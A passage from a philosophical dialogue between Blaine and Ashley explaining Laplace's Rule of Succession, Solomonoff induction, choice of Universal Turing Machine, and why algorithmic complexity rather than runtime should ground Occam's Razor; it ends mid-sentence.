BLAINE: The original problem considered by Thomas Bayes was about an ideal billiard ball bouncing back and forth on an ideal billiard table many times and eventually slowing to a halt; and then bouncing other billiards to see if they halted to the left or the right of the first billiard. You can see why, in first considering the simplest form of this problem without any complications, we might consider every position of the first billiard to be equally probable.
ASHLEY: Sure. Though I note with pointless pedantry that if the billiard was really an ideal rolling sphere and the walls were perfectly reflective, it'd never halt in the first place.
BLAINE: Suppose we're told that, after rolling the original billiard ball and then 5 more billiard balls, one billiard ball was to the right of the original, an R. The other four were to the left of the original, or Ls. Again, that's 1 R and 4 Ls. Given only this data, what is the probability that the next billiard ball rolled will be on the left of the original, another L?
ASHLEY: Five sevenths.
BLAINE: Ah, you've heard this problem before?
ASHLEY: No, but it's obvious.
BLAINE: Uh... really?
ASHLEY: Combinatorics. Consider just the orderings of the balls, instead of their exact positions.
Designate the original ball with the symbol ❚, the next five balls as LLLLR, and the next ball to be rolled as ✚. Given that the current ordering of these six balls is LLLL❚R and that all positions and spacings of the underlying balls are equally likely, after rolling the ✚, there will be seven equally likely orderings ✚LLLL❚R, L✚LLL❚R, LL✚LL❚R, and so on up to LLLL❚✚R and LLLL❚R✚. In five of those seven orderings, the ✚ is on the left of the ❚. In general, if we see m of L and n of R, the probability of the next item being an L is (m + 1) / (m + n + 2).
BLAINE: Gosh... Well, the much more complicated proof originally devised by Thomas Bayes starts by considering every position of the original ball to be equally likely a priori, the additional balls as providing evidence about that position, and then integrating over the posterior probabilities of the original ball's possible positions to arrive at the probability that the next ball lands on the left or right.
ASHLEY: Heh. And is all that extra work useful if you also happen to know a little combinatorics?
BLAINE: Well, it tells me exactly how my beliefs about the original ball change with each new piece of evidence—the new posterior probability function on the ball's position. Suppose I instead asked you something along the lines of, "Given 4 L and 1 R, where do you think the original ball ❚ is most likely to be on the number line? How likely is it to be within 0.1 distance of there?"
ASHLEY: That's fair; I don't see a combinatoric answer for the latter part. You'd have to actually integrate over the posterior density function, which is proportional to x^4 · (1 − x).
BLAINE: Anyway, let's just take at face value that Laplace's Rule of Succession says that, after observing M 1s and N 0s, the probability of getting a 1 next is (M + 1) / (M + N + 2).
ASHLEY: But of course.
BLAINE: We can consider Laplace's Rule as a short Python program that takes in a sequence of 1s and 0s, and spits out the probability that the next bit in the sequence will be 1.
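(That short program can be written out explicitly. This is one minimal sketch; the function name is my own:)

```python
def laplace_prob_next_is_one(sequence):
    """Laplace's Rule of Succession: after seeing M ones and N zeroes,
    predict the next bit is 1 with probability (M + 1) / (M + N + 2)."""
    m = sum(sequence)       # number of 1s seen so far
    n = len(sequence) - m   # number of 0s seen so far
    return (m + 1) / (m + n + 2)

# Reading L as 1 and R as 0, the billiard data LLLLR reproduces
# Ashley's combinatoric answer of five sevenths for the next L:
print(laplace_prob_next_is_one([1, 1, 1, 1, 0]))  # -> 0.7142857142857143 (= 5/7)
```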
We can also consider it as a probability distribution over infinite sequences, like this:

- 0 : 1/2
- 1 : 1/2
- 00 : 1/3
- 01 : 1/6
- 000 : 1/4
- 001 : 1/12
- 010 : 1/12

... and so on. Now, we can view this as a rule someone might espouse for predicting coinflips, but also view it as corresponding to a particular class of possible worlds containing randomness. I mean, Laplace's Rule isn't the only rule you could use. Suppose I had a barrel containing ten white balls and ten green balls. If you already knew this about the barrel, then after seeing W white balls and G green balls, you'd predict the next ball being white with probability (10 − W) / (20 − W − G). If you use Laplace's Rule, that's like believing the world was like a billiards table with an original ball rolling to a stop at a random point and new balls ending up on the left or right. If you use (10 − W) / (20 − W − G), that's like the hypothesis that there are ten green balls and ten white balls in a barrel. There isn't really a sharp border between rules we can use to predict the world, and rules for how the world behaves—
ASHLEY: Well, that sounds just plain wrong. The map is not the territory, don'cha know? If Solomonoff induction can't tell the difference between maps and territories, maybe it doesn't contain all epistemological goodness after all.
BLAINE: Maybe it'd be better to say that there's a dualism between good ways of computing predictions and being in actual worlds where that kind of predicting works well? Like, you could also see Laplace's Rule as implementing the rules for a world with randomness where the original billiard ball ends up in a random place, so that the first thing you see is equally likely to be 1 or 0. Then to ask what probably happens on round 2, we tell the world what happened on round 1 so that it can update what the background random events were.
ASHLEY: Mmmaybe.
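(The sequence probabilities in Blaine's list follow from chaining the Laplace conditionals; a quick check with exact fractions, as a sketch of my own:)

```python
from fractions import Fraction

def laplace_seq_prob(bits):
    """Probability Laplace's Rule assigns to a whole bit-sequence,
    multiplying the conditional probability of each successive bit."""
    p = Fraction(1)
    for i, b in enumerate(bits):
        ones = sum(bits[:i])
        p_one = Fraction(ones + 1, i + 2)  # (M + 1) / (M + N + 2)
        p *= p_one if b == 1 else 1 - p_one
    return p

for s in ["0", "1", "00", "01", "000", "001", "010"]:
    print(s, laplace_seq_prob([int(c) for c in s]))
# 0 -> 1/2, 1 -> 1/2, 00 -> 1/3, 01 -> 1/6,
# 000 -> 1/4, 001 -> 1/12, 010 -> 1/12
```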
BLAINE: If you go with the version where Solomonoff induction is over programs that just spit out a determined string of ones and zeroes, we could see those programs as corresponding to particular environments—ways the world could be that would produce our sensory input, the sequence. We could jump ahead and consider the more sophisticated decision-problem that appears in AIXI: an environment is a program that takes your motor outputs as its input, and then returns your sensory inputs as its output. Then we can see a program that produces Bayesian-updated predictions as corresponding to a hypothetical probabilistic environment that implies those updates, although they'll be conjugate systems rather than mirror images.
ASHLEY: Do those two versions of Solomonoff induction, the one over deterministic programs and the one over probability-assigning programs, end up making the same predictions?
BLAINE: I'm told the answers are the same but I confess I can't quite see why, unless there's some added assumption I'm missing. So let's talk about programs that assign probabilities for now, because I think that case is clearer.

iv. Simplicity

BLAINE: The next key idea is to prefer simple programs that assign high probability to our observations so far.
ASHLEY: It seems like an obvious step, especially considering that you were already talking about "simple programs" and Occam's Razor a while back. Solomonoff induction is part of the Bayesian program of inference, right?
BLAINE: Indeed. Very much so.
ASHLEY: Okay, so let's talk about the program, or hypothesis, for "This barrel has an unknown frequency of white and green balls", versus the hypothesis "This barrel has 10 white and 10 green balls", versus the hypothesis, "This barrel always puts out a green ball after a white ball and vice versa." Let's say we see a green ball, then a white ball, the sequence GW. The first hypothesis assigns this probability 1/2 · 1/3 = 1/6, the second hypothesis assigns this probability 10/20 · 10/19, or roughly 1/4, and the third hypothesis assigns probability 1/2.
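(Ashley's three likelihoods for the sequence GW can be computed explicitly. A sketch with exact fractions; treating the 10-white/10-green barrel as drawn without replacement is my reading of the setup:)

```python
from fractions import Fraction

# Hypothesis 1: Laplace's Rule over the green/white draws.
# P(G first) = 1/2, then P(W | one G seen) = (0 + 1) / (1 + 2) = 1/3.
h1 = Fraction(1, 2) * Fraction(1, 3)      # 1/6

# Hypothesis 2: a barrel of 10 white and 10 green balls, drawn without
# replacement: P(G) = 10/20, then P(W) = 10/19.
h2 = Fraction(10, 20) * Fraction(10, 19)  # 5/19, roughly 1/4

# Hypothesis 3: colors strictly alternate; only the first ball's color
# is uncertain, G or W with probability 1/2 each.
h3 = Fraction(1, 2)                       # 1/2

print(h1, h2, h3)  # -> 1/6 5/19 1/2
```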
Now it seems to me that there's some important sense in which, even though Laplace's Rule assigned a lower probability to the data, it's significantly simpler than the second and third hypotheses and is the wiser answer. Does Solomonoff induction agree?
BLAINE: I think you might be taking into account some prior knowledge that isn't in the sequence itself, there. Like, things that alternate either 101010... or 010101... are objectively simple in the sense that a short computer program simulates them or assigns probabilities to them. It's just unlikely to be true about an actual barrel of white and green balls. If 10 is literally the first sense data that you ever see, when you are a fresh new intelligence with only two bits to rub together, then "The universe consists of alternating bits" is no less reasonable than "The universe produces bits with an unknown random frequency anywhere between 0 and 1."
ASHLEY: Conceded. But as I was going to say, we have three hypotheses that assigned 1/6, roughly 1/4, and 1/2 to the observed data; but to know the posterior probabilities of these hypotheses we need to actually say how relatively likely they were a priori, so we can multiply by the odds ratio. Like, if the prior odds were 1 : 1 : 1, the posterior odds would be 2 : 3 : 6. Now, how would Solomonoff induction assign prior probabilities to those computer programs? Because I remember you saying, way back when, that you thought Solomonoff was the answer to "How should Bayesians assign priors?"
BLAINE: Well, how would you do it?
ASHLEY: I mean... yes, the simpler rules should be favored, but it seems to me that there's some deep questions as to the exact relative 'simplicity' of the rule (M + 1) / (M + N + 2), or the rule (10 − W) / (20 − W − G), or the rule "alternate the bits"...
BLAINE: Suppose I ask you to just make up some simple rule.
ASHLEY: Okay, if I just say the rule I think you're looking for, the rule would be, "The complexity of a computer program is the number of bits needed to specify it to some arbitrary but reasonable choice of compiler or Universal Turing Machine, and the prior probability is 1/2 to the power of the number of bits." Since, e.g., there are 32 possible 5-bit programs, each such program has probability 1/32. So if it takes 16 bits to specify Laplace's Rule of Succession, which seems a tad optimistic, then the prior probability would be 2^-16, which seems a tad pessimistic.
BLAINE: Now just apply that rule to the infinity of possible computer programs that assign probabilities to the observed data, update their posterior probabilities based on the probability they've assigned to the evidence so far, sum over all of them to get your next prediction, and we're done. And yes, that requires a hypercomputer that can solve the halting problem, but we're talking ideals here. Let P be the set of all programs, |p| be the length in bits of a program p, and s be the sense data so far, with p(s) the probability that program p assigned to that data; then

P(next bit is 1 | s) = [ Σ_{p in P} 2^-|p| · p(s) · p(1 | s) ] / [ Σ_{p in P} 2^-|p| · p(s) ]

ASHLEY: Uh.
BLAINE: Yes?
ASHLEY: Um...
BLAINE: What is it?
ASHLEY: You invoked a countably infinite set, so I'm trying to figure out if my predicted probability for the next bit must necessarily converge to a limit as I consider increasingly large finite subsets in any order.
BLAINE: (sighs) Of course you are.
ASHLEY: I think you might have left out some important caveats. Like, if I take the rule literally, then the program "0" has probability 1/2, the program "1" has probability 1/2, the program "01" has probability 1/4, and now the total probability is 1 + 1/4, which is too much. So I can't actually normalize it because the series sums to infinity. Now, this just means we need to, say, decide that the probability of a program having length 1 is 1/2, the probability of it having length 2 is 1/4, and so on out to infinity, but it's an added postulate.
BLAINE: The conventional method is to require a prefix-free code.
If "0111" is a valid program then "01110" cannot be a valid program. With that constraint, assigning "1/2 to the power of the length of the code" to all valid codes will sum to at most 1; and we can normalize their relative probabilities to get the actual prior.
ASHLEY: Okay. And you're sure that it doesn't matter in what order we consider more and more programs as we approach the limit, because... no, I see it. Every program has positive probability mass, with the total set summing to 1, and Bayesian updating doesn't change that. So as I consider more and more programs, in any order, there are only so many large contributions that can be made from the mix—there's only so often that the final probability can change. Like, let's say there are at most 99 programs with probability 1% that assign probability 0 to the next bit being a 1; that's only 99 times the final answer can go down by as much as 1%, as the limit is approached.
BLAINE: This idea generalizes, and is important. List all possible computer programs, in any order you like. Use any definition of simplicity that you like, so long as for any given amount of simplicity, there are only a finite number of computer programs that simple. As you go on carving off chunks of prior probability mass and assigning them to programs, it must be the case that as programs get more and more complicated, their prior probability approaches zero!—though it's still positive for every finite program, because of Cromwell's Rule. You can't have more than 99 programs assigned 1% prior probability and still obey Cromwell's Rule, which means there must be some most complex program that is assigned 1% probability, which means every more complicated program must have less than 1% probability out to the end of the infinite list.
ASHLEY: Huh. I don't think I've ever heard that justification for Occam's Razor before. I think I like it.
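(A toy illustration, my own example, of why the prefix-free requirement makes the 2^-length weights sum to at most 1, where Ashley's unrestricted codes overshot:)

```python
def is_prefix_free(codes):
    """True if no code in the set is a proper prefix of another."""
    return not any(a != b and b.startswith(a) for a in codes for b in codes)

def kraft_sum(codes):
    """Sum of 2^-len(c); at most 1 for any prefix-free binary code set
    (the Kraft inequality)."""
    return sum(2.0 ** -len(c) for c in codes)

bad = ["0", "1", "01"]            # "0" is a prefix of "01"
good = ["0", "10", "110", "111"]  # prefix-free

print(is_prefix_free(bad), kraft_sum(bad))    # -> False 1.25  (too much)
print(is_prefix_free(good), kraft_sum(good))  # -> True 1.0
```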
I mean, I've heard a lot of appeals to the empirical simplicity of the world, and so on, but this is the first time I've seen a logical proof that, in the limit, more complicated hypotheses must be less likely than simple ones.
BLAINE: Behold the awesomeness that is Solomonoff induction!

v. Choice of Universal Turing Machine

ASHLEY: My next question is about the choice of Universal Turing Machine—the choice of compiler for our program codes. There's an infinite number of possibilities there, and in principle, the right choice of compiler can make our probability for the next thing we'll see be anything we like. At least I'd expect this to be the case, based on how the "problem of induction" usually goes. So with the right choice of Universal Turing Machine, our online crackpot can still make it be the case that Solomonoff induction predicts Canada invading the USA.
BLAINE: One way of looking at the problem of good epistemology, I'd say, is that the job of a good epistemology is not to make it impossible to err. You can still blow off your foot if you really insist on pointing the shotgun at your foot and pulling the trigger. The job of good epistemology is to make it more obvious when you're about to blow your own foot off with a shotgun. On this dimension, Solomonoff induction excels. If you claim that we ought to pick an enormously complicated compiler to encode our hypotheses, in order to make the 'simplest hypothesis that fits the evidence' be one that predicts Canada invading the USA, then it should be obvious to everyone except you that you are in the process of screwing up.
ASHLEY: Ah, but of course they'll say that their code is just the simple and natural choice of Universal Turing Machine, because they'll exhibit a meta-UTM which outputs that UTM given only a short code.
And if you say the meta-UTM is complicated—
BLAINE: Flon's Law says, "There is not now, nor has there ever been, nor will there ever be, any programming language in which it is the least bit difficult to write bad code." You can't make it impossible for people to screw up, but you can make it more obvious. And Solomonoff induction would make it even more obvious than might at first be obvious, because—
ASHLEY: Your Honor, I move to have the previous sentence taken out and shot.
BLAINE: Let's say that the whole of your sensory information is the string 10101010... Consider the stupid hypothesis, "This program has a 99% probability of producing a 1 on every turn", which you jumped to after seeing the first bit. What would you need to claim your priors were like—what Universal Turing Machine would you need to endorse—in order to maintain blind faith in that hypothesis in the face of ever-mounting evidence?
ASHLEY: You'd need a Universal Turing Machine blind-utm that assigned a very high probability to the blind program "def ProbNextElementIsOne(previous_sequence): return 0.99". Like, if blind-utm sees the code 0, it executes the blind program "return 0.99". And to defend yourself against charges that your UTM blind-utm was not itself simple, you'd need a meta-UTM, blind-meta, which, when it sees the code 10, executes blind-utm. And to really wrap it up, you'd need to take a fixed point through all towers of meta and use diagonalization to create the UTM blind-diag that, when it sees the program code 0, executes "return 0.99", and when it sees the program code 10, executes blind-diag. I guess I can see some sense in which, even if that doesn't resolve Hume's problem of induction, anyone actually advocating that would be committing blatant shenanigans on a commonsense level, arguably more blatant than it would have been if we hadn't made them present the UTM.
BLAINE: Actually, the shenanigans have to be much worse than that in order to fool Solomonoff induction.
Like, Solomonoff induction using your blind-diag isn't fooled for a minute, even taking blind-diag entirely on its own terms.
ASHLEY: Really?
BLAINE: Assuming 60 sequence items per second? Yes, absolutely, Solomonoff induction shrugs off the delusion in the first minute, unless there are further and even more blatant shenanigans. We did require that your blind-diag be a Universal Turing Machine, meaning that it can reproduce every computable probability distribution over sequences, given some particular code to compile. Let's say there's a 200-bit code laplace for Laplace's Rule of Succession, "lambda sequence: (sequence.count('1') + 1) / (len(sequence) + 2)", so that its prior probability relative to the 1-bit code for blind is 1 : 2^199. Let's say that the sense data is around 50/50 1s and 0s. Every time we see a 1, blind gains a factor of 2 over laplace (99% vs. 50% probability), and every time we see a 0, blind loses a factor of 50 over laplace (1% vs. 50% probability). On average, every 2 bits of the sequence, blind is losing a factor of 25 or, say, a bit more than 4 bits, i.e., on average blind is losing two bits of probability per element of the sequence observed. So it's only going to take 100 bits, or a little less than two seconds, for laplace to win out over blind.
ASHLEY: I see. I was focusing on a UTM that assigned lots of prior probability to blind, but what I really needed was a compiler that, while still being universal and encoding every possibility somewhere, still assigned a really tiny probability to laplace, to faircoin that encodes "return 0.5", and to every other hypothesis that does better, round by round, than blind. So what I really need to carry off the delusion is obstinate-diag that is universal, assigns high probability to blind, requires billions of bits to specify laplace, and also requires billions of bits to specify any UTM that can execute laplace as a shorter code than billions of bits.
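(Blaine's arithmetic can be checked with a small simulation. This sketch, with function names of my own, gives laplace a 199-bit prior handicap against blind and feeds both a random 50/50 bit stream:)

```python
import math
import random

def log2_laplace(bit, ones, total):
    # Laplace's Rule: P(next is 1) = (ones + 1) / (total + 2)
    p_one = (ones + 1) / (total + 2)
    return math.log2(p_one if bit == 1 else 1.0 - p_one)

def log2_blind(bit):
    # blind: always 99% on the next bit being a 1
    return math.log2(0.99 if bit == 1 else 0.01)

random.seed(0)
log_odds = -199.0  # laplace starts 199 bits behind blind in prior probability
ones = 0
bits_seen = 0
for _ in range(10_000):
    bit = random.randrange(2)  # roughly 50/50 sense data
    log_odds += log2_laplace(bit, ones, bits_seen) - log2_blind(bit)
    ones += bit
    bits_seen += 1
    if log_odds > 0:
        break

print(f"laplace overtakes blind after {bits_seen} bits of 50/50 data")
```

On a 50/50 stream, blind loses about two bits per element on average, so the crossover lands near the 100-bit mark Blaine computes.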
Because otherwise we will say, "Ah, but given the evidence, this other UTM would have done better." I agree that those are even more blatant shenanigans than I thought.
BLAINE: Yes. And even then, even if your UTM takes two billion bits to specify faircoin, Solomonoff induction will lose its faith in blind after seeing a billion bits. Which will happen before the first year is out, if we're getting 60 bits per second. And if you turn around and say, "Oh, well, I didn't mean that was my UTM, I really meant this was my UTM, this thing over here where it takes a trillion bits to encode faircoin", then that's probability-theory-violating shenanigans where you're changing your priors as you go.
ASHLEY: That's actually a very interesting point—that what's needed for a Bayesian to maintain a delusion in the face of mounting evidence is not so much a blindly high prior for the delusory hypothesis, as a blind skepticism of all its alternatives. But what if their UTM requires a googol bits to specify faircoin? What if blind and blind-diag, or programs pretty much isomorphic to them, are the only programs that can be specified in less than a googol bits?
BLAINE: Then your desire to shoot your own foot off has been made very, very visible to anyone who understands Solomonoff induction. We're not going to get absolutely objective prior probabilities as a matter of logical deduction, not without principles that are unknown to me and beyond the scope of Solomonoff induction. But we can make the stupidity really blatant and force you to construct a downright embarrassing Universal Turing Machine.
ASHLEY: I guess I can see that. I mean, I guess that if you're presenting a ludicrously complicated Universal Turing Machine that just refuses to encode the program that would predict Canada not invading, that's more visibly silly than a verbal appeal that says, "But you must just have faith that Canada will invade."
I guess part of me is still hoping for a more objective sense of "complicated".
BLAINE: We could say that reasonable UTMs should contain a small number of wheels and gears in a material instantiation under our universe's laws of physics, which might in some ultimate sense provide a prior over priors. Like, the human brain evolved from DNA-based specifications, and the things you can construct out of relatively small numbers of physical objects are 'simple' under the 'prior' implicitly searched by natural selection.
ASHLEY: Ah, but what if I think it's likely that our physical universe or the search space of DNA won't give us a good idea of what's complicated?
BLAINE: For your alternative notion of what's complicated to go on being believed even as other hypotheses are racking up better experimental predictions, you need to assign a ludicrously low probability that our universe's space of physical systems buildable using a small number of objects could possibly provide better predictions of that universe than your complicated alternative notion of prior probability. We don't need to appeal that it's a priori more likely than not that "a universe can be predicted well by low-object-number machines built using that universe's physics." Instead, we appeal that it would violate Cromwell's Rule, and would constitute exceedingly special pleading, to assign the possibility of a physically learnable universe a probability of less than 2^-1,000,000. It then takes only a megabit of exposure to notice that the universe seems to be regular.
ASHLEY: In other words, so long as you don't start with an absolute and blind prejudice against the universe being predictable by simple machines encoded in our universe's physics—so long as, on this planet of seven billion people, you don't assign probabilities less than 2^-1,000,000 to the other person being right about what is a good Universal Turing Machine—then the pure logic of Bayesian updating will rapidly force you to the conclusion that induction works.
vi. Why algorithmic complexity?

ASHLEY: Hm. I don't know that good pragmatic answers to the problem of induction were ever in short supply. Still, on the margins, it's a more forceful pragmatic answer than the last one I remember hearing.
BLAINE: Yay! Now isn't Solomonoff induction wonderful?
ASHLEY: Maybe? You didn't really use the principle of computational simplicity to derive that lesson. You just used that some inductive principle ought to have a prior probability of more than 2^-1,000,000.
BLAINE: ...
ASHLEY: Can you give me an example of a problem where the computational definition of simplicity matters and can't be factored back out of an argument?
BLAINE: As it happens, yes I can. I can give you three examples of how it matters.
ASHLEY: Vun... two... three! Three examples! Ah-ah-ah!
BLAINE: Must you do that every—oh, never mind. Example one is that galaxies are not so improbable that no one could ever believe in them, example two is that the limits of possibility include Terence Tao, and example three is that diffraction is a simpler explanation of rainbows than divine intervention.
ASHLEY: These statements are all so obvious that no further explanation of any of them is required.
BLAINE: On the contrary! And I'll start with example one. Back when the Andromeda Galaxy was a hazy mist seen through a telescope, and someone first suggested that maybe that hazy mist was an incredibly large number of distant stars—that many "nebulae" were actually distant galaxies, and our own Milky Way was only one of them—there was a time when Occam's Razor was invoked against that hypothesis.
ASHLEY: What? Why?
BLAINE: They invoked Occam's Razor against the galactic hypothesis, because if that were the case, then there would be a much huger number of stars in the universe, and the stars would be entities, and Occam's Razor said "Entities are not to be multiplied beyond necessity."
ASHLEY: That's not how Occam's Razor works. The "entities" of a theory are its types, not its objects.
If you say that the hazy mists are distant galaxies of stars, then you've reduced the number of laws because you're just postulating a previously seen type, namely stars organized into galaxies, instead of a new type of hazy astronomical mist. BLAINE: Okay, but imagine that it's the nineteenth century and somebody replies to you, "Well, I disagree! William of Ockham said not to multiply entities, this galactic hypothesis obviously creates a huge number of entities, and that's the way I see it!" ASHLEY: I think I'd give them your spiel about there being no human epistemology that can stop you from shooting off your own foot. BLAINE: I don't think you'd be justified in giving them that lecture. I'll parenthesize at this point that you ought to be very careful when you say "I can't stop you from shooting off your own foot", lest it become a Fully General Scornful Rejoinder. Like, if you say that to someone, you'd better be able to explain exactly why Occam's Razor counts types as entities but not objects. In fact, you'd better explain that to someone before you go advising them not to shoot off their own foot. And once you've told them what you think is foolish and why, you might as well stop there. Except in really weird cases of people presenting us with enormously complicated and jury-rigged Universal Turing Machines, and then we say the shotgun thing. ASHLEY: That's fair. So, I'm not sure what I'd have answered before starting this conversation, which is much to your credit, friend Blaine. But now that I've had this conversation, it's obvious that it's new types and not new objects that use up the probability mass we need to distribute over all hypotheses. Like, I need to distribute my probability mass over "Hypothesis 1: there are stars" and "Hypothesis 2: there are stars plus huge distant hazy mists". I don't need to distribute my probability mass over all the actual stars in the galaxy! 
BLAINE: In terms of Solomonoff induction, we penalize a program's lines of code rather than its runtime or RAM used, because we need to distribute our probability mass over possible alternatives each time we add a line of code. There's no corresponding choice between mutually exclusive alternatives when a program uses more runtime or RAM. (ELIEZER: (whispering) Unless we need a leverage prior to consider the hypothesis of being a particular agent inside all that RAM or runtime.) ASHLEY: Or to put it another way: any fully detailed model of the universe would require some particular arrangement of stars, and the more stars there are, the more possible arrangements there are. But when we look through the telescope and see a hazy mist, we get to sum over all arrangements of stars that would produce that hazy mist. If some galactic hypothesis required a hundred billion stars to all be in particular exact places without further explanation or cause, then that would indeed be a grave improbability. BLAINE: Precisely. And if you needed all the hundred billion stars to be in particular exact places, that's just the kind of hypothesis that would take a huge computer program to specify. ASHLEY: But does it really require learning Solomonoff induction to understand that point? Maybe the bad argument against galaxies was just a motivated error somebody made in the nineteenth century, because they didn't want to live in a big universe for emotional reasons. BLAINE: The same debate is playing out today over no-collapse versions of quantum mechanics, also somewhat unfortunately known as "many-worlds interpretations". Now, regardless of what anyone thinks of all the other parts of that debate, there's a particular sub-argument where somebody says, "It's simpler to have a collapse interpretation because all those extra quantum 'worlds' are extra entities that are unnecessary under Occam's Razor since we can't see them." 
And Solomonoff induction tells us that this invocation of Occam's Razor is flatly misguided because Occam's Razor does not work like that. Basically, they're trying to cut down the RAM and runtime of the universe, at the expense of adding an extra line of code, namely the code for the collapse postulate that prunes off parts of the wavefunction that are in undetectably weak causal contact with us. ASHLEY: Hmm. Now that you put it that way, it's not so obvious to me that it makes sense to have no prejudice against sufficiently enormous universes. I mean, the universe we see around us is exponentially vast but not superexponentially vast—the visible atoms are 10^80 in number or so, not 10^(10^80) or "bigger than Graham's Number". Maybe there's some fundamental limit on how much gets computed. BLAINE: You, um, know that on the Standard Model, the universe doesn't just cut out and stop existing at the point where our telescopes stop seeing it? There isn't a giant void surrounding a little bubble of matter centered perfectly on Earth? It calls for a literally infinite amount of matter? I mean, I guess if you don't like living in a universe with more than 10^80 entities, a universe where too much gets computed, you could try to specify extra laws of physics that create an abrupt spatial boundary with no further matter beyond them, somewhere out past where our telescopes can see— ASHLEY: All right, point taken. (ELIEZER: (whispering) Though I personally suspect that the spatial multiverse and the quantum multiverse are the same multiverse, and that what lies beyond the reach of our telescopes is not entangled with us—meaning that the universe is as finitely large as the superposition of all possible quantum branches, rather than being literally infinite in space.) BLAINE: I mean, there is in fact an alternative formalism to Solomonoff induction, namely Levin search, which says that program complexities are further penalized by the logarithm of their runtime.
In other words, it would say that 'explanations' or 'universes' that require a long time to run are inherently less probable. Some people like Levin search more than Solomonoff induction because it's more computable. I dislike Levin search because (a) it has no fundamental epistemic justification and (b) it assigns probability zero to quantum mechanics. ASHLEY: Can you unpack that last part? BLAINE: If, as is currently suspected, there's no way to simulate quantum computers using classical computers without an exponential slowdown, then even in principle, this universe requires exponentially vast amounts of classical computing power to simulate. Let's say that with sufficiently advanced technology, you can build a quantum computer with a million qubits. On Levin's definition of complexity, for the universe to be like that is as improbable a priori as any particular set of laws of physics that must specify on the order of one million equations. Can you imagine how improbable it would be to see a list of one hundred thousand differential equations, without any justification or evidence attached, and be told that they were the laws of physics? That's the kind of penalty that Levin search or Schmidhuber's Speed Prior would attach to any laws of physics that could run a quantum computation of a million qubits, or, heck, any physics that claimed that a protein was being folded in a way that ultimately went through considering millions of quarks interacting. If you're not absolutely certain a priori that the universe isn't like that, you don't believe in Schmidhuber's Speed Prior. Even with a collapse postulate, the amount of computation that goes on before a collapse would be prohibited by the Speed Prior. ASHLEY: Okay, yeah. 
If you're phrasing it that way—that the Speed Prior assigns probability nearly zero to quantum mechanics, so we shouldn't believe in the Speed Prior—then I can't easily see a way to extract out the same point without making reference to ideas like penalizing algorithmic complexity but not penalizing runtime. I mean, maybe I could extract the lesson back out but it's easier to say, or more obvious, by pointing to the idea that Occam's Razor should penalize algorithmic complexity but not runtime. BLAINE: And that isn't just implied by Solomonoff induction, it's pretty much the whole idea of Solomonoff induction, right? ASHLEY: Maaaybe. BLAINE: For example two, that Solomonoff induction outperforms even Terence Tao, we want to have a theorem that says Solomonoff induction catches up to every computable way of reasoning in the limit. Since we iterated through all possible computer programs, we know that somewhere in there is a simulated copy of Terence Tao in a simulated room, and if this requires a petabyte to specify, then we shouldn't have to make more than a quadrillion bits of error relative to Terence Tao before zeroing in on the Terence Tao hypothesis. I mean, in practice, I'd expect far less than a quadrillion bits of error before the system was behaving like it was vastly smarter than Terence Tao. It'd take a lot less than a quadrillion bits to give you some specification of a universe with simple physics that gave rise to a civilization of vastly greater than intergalactic extent. Like, Graham's Number is a very simple number, so it's easy to specify a universe that runs for that long before it returns an answer. It's not obvious how you'd extract Solomonoff predictions from that civilization and incentivize them to make good ones, but I'd be surprised if there were no Turing machine of fewer than one thousand states which did that somehow. ASHLEY: ... 
BLAINE: And for all I know there might be even better ways than that of getting exceptionally good predictions, somewhere in the list of the first decillion computer programs. That is, somewhere in the first 110 bits. ASHLEY: So your basic argument is, "Never mind Terence Tao, Solomonoff induction dominates God." BLAINE: Solomonoff induction isn't the epistemic prediction capability of a superintelligence. It's the epistemic prediction capability of something that eats superintelligences like potato chips. ASHLEY: Is there any point to contemplating an epistemology so powerful that it will never begin to fit inside the universe? BLAINE: Maybe? I mean, a lot of times, you just find people failing to respect the notion of ordinary superintelligence, doing the equivalent of supposing that a superintelligence behaves like a bad Hollywood genius and misses obvious-seeming moves. And a lot of times you find them insisting that "there's a limit to how much information you can get from the data" or something along those lines. "That Alien Message" is intended to convey the counterpoint, that smarter entities can extract more info than is immediately apparent on the surface of things. Similarly, thinking about Solomonoff induction might also cause someone to realize that if, say, you simulated zillions of possible simple universes, you could look at which agents were seeing exact data like the data you got, and figure out where you were inside that range of possibilities, so long as there was literally any correlation to use. And if you say that an agent can't extract that data, you're making a claim about which shortcuts to Solomonoff induction are and aren't computable. In fact, you're probably pointing at some particular shortcut and claiming nobody can ever figure that out using a reasonable amount of computing power even though the info is there in principle. Contemplating Solomonoff induction might help people realize that, yes, the data is there in principle.
Like, until I ask you to imagine a civilization running for Graham's Number of years inside a Graham-sized memory space, you might not imagine them trying all the methods of analysis that you personally can imagine being possible. ASHLEY: If somebody is making that mistake in the first place, I'm not sure you can beat it out of them by telling them the definition of Solomonoff induction. BLAINE: Maybe not. But to brute-force somebody into imagining that sufficiently advanced agents have Level 1 protagonist intelligence, that they are epistemically efficient rather than missing factual questions that are visible even to us, you might need to ask them to imagine an agent that can see literally anything seeable in the computational limit just so that their mental simulation of the ideal answer isn't running up against stupidity assertions. Like, I think there are a lot of people who could benefit from looking over the evidence they already personally have, and asking what a Solomonoff inductor could deduce from it, so that they wouldn't be running up against stupidity assertions about themselves. It's the same trick as asking yourself what God, Richard Feynman, or a "perfect rationalist" would believe in your shoes. You just have to pick a real or imaginary person that you respect enough for your model of that person to lack the same stupidity assertions that you believe about yourself. ASHLEY: Well, let's once again try to factor out the part about Solomonoff induction in particular. If we're trying to imagine something epistemically smarter than ourselves, is there anything we get from imagining a complexity-weighted prior over programs in particular? That we don't get from, say, trying to imagine the reasoning of one particular Graham-Number-sized civilization? 
BLAINE: We get the surety that even anything we imagine Terence Tao himself as being able to figure out, is something that is allowed to be known after some bounded number of errors versus Terence Tao, because Terence Tao is inside the list of all computer programs and gets promoted further each time the dominant paradigm makes a prediction error relative to him. We can't get that dominance property without invoking "all possible ways of computing" or something like it—we can't incorporate the power of all reasonable processes, unless we have a set such that all the reasonable processes are in it. The enumeration of all possible computer programs is one such set. ASHLEY: Hm. BLAINE: Example three, diffraction is a simpler explanation of rainbows than divine intervention. I don't think I need to belabor this point very much, even though in one way it might be the most central one. It sounds like "Jehovah placed rainbows in the sky as a sign that the Great Flood would never come again" is a 'simple' explanation; you can explain it to a child in nothing flat. Just the diagram of diffraction through a raindrop, to say nothing of the Principle of Least Action underlying diffraction, is something that humans don't usually learn until undergraduate physics, and it sounds more alien and less intuitive than Jehovah. In what sense is this intuitive sense of simplicity wrong? What gold standard are we comparing it to, that could be a better sense of simplicity than just 'how hard is it for me to understand'? The answer is Solomonoff induction and the rule which says that simplicity is measured by the size of the computer program, not by how hard things are for human beings to understand. Diffraction is a small computer program; any programmer who understands diffraction can simulate it without too much trouble. Jehovah would be a 